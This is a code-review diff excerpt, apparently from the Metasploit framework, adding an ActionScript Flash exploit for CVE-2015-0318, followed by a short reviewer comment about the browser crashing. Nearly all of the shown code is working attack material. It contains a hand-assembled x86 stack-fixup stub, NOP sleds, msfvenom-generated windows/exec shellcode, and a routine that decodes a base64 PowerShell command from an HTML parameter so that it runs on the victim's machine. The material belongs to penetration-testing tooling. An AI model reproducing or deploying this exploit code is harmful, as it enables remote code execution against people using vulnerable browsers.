external/source/exploits/CVE-2015-0318/Main.as

```diff
@@ -0,0 +1,704 @@
+			var myshellcode:Array = GetPayload();
+			// at this point we are sandwiched on the stack between the current
+			// frame and the previous frame; this is hazardous, we need to 
+			// shift our stack back above the current frame or things will go 
+			// wrong(tm).
+			v[i++] = 0x1000ec81; // 81ec00100000      sub esp, 0x1000
+			v[i++] = 0x90900000;
+
+			v[i++] = 0x90909090;
+			v[i++] = 0x90909090;
+			v[i++] = 0x90909090;
+			//v[i++] = 0xcccccccc; // Sort of handy for debugging purposes
+
+			// Our payload (see GetPayload)
+			for (var payload_i:int; payload_i < myshellcode.length; payload_i++) {
+				v[i++] = myshellcode[payload_i];
+			}
+
+			v[i++] = 0x90909090;
+			v[i++] = 0x90909090;
+			v[i++] = 0x90909090;
+			//v[i++] = 0xcccccccc; // Sort of handy for debugging purposes
+			
+
+			// we just put things back how they were; at least, everything 
+			// important. we need esp and ebp to be correct, which is easy;
+			// we need ecx to point to the object's vtable and then we can
+			// just jump to the actual method implementation as though we
+			// had hooked it.
+			
+			v[i++] = 0x0bf8c481; // 81C4F80B0000      add esp,0xbf8
+			v[i++] = 0x90900000;
+			v[i++] = 0x1c24ac8d; // 8DAC241c120000    lea ebp,[esp+0x121c]
+			v[i++] = 0x90000012;
+			v[i++] = 0xb9909090; // B944434241        mov ecx, vtable_ptr
+			v[i++] = ptr;
+			v[i++] = 0xb8909090; // B844434241        mov eax, orig_function_ptr
+			v[i++] = fun;   
+			v[i++] = 0x9090e0ff; // FFE0              jmp eax
+		}
+
+		public function GetPayload():Array {
+			// Grab the powershell payload from the sh parameter in the HTML file
+			var b64:Base64Decoder = new Base64Decoder();
+			var raw_psh_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh;
+			b64.decode(raw_psh_payload);
+			var psh_payload:String = b64.toByteArray().toString();
+
+			// This is generated from here:
+			// ./msfvenom -p windows/exec CMD=AAAA -f ruby -e generic/none
+			// The original souce can be found at: msf/externa/source/shellcode/single_exec.asm
+			var payload:String = "" +
+			"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14" +
+			"\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +
+			"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59" +
+			"\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" +
+			"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
+			"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" +
+			"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68" +
+			"\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" +
+			"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" + psh_payload + "\x00";
```

Comment:
Yeah the crash is normal, is crashing the iexplore not the session. Okey, I was not understanding why the exec staget was being used here. It's weird which you cannot share binay b64 encoded data. Okey. Thanks for the explanation!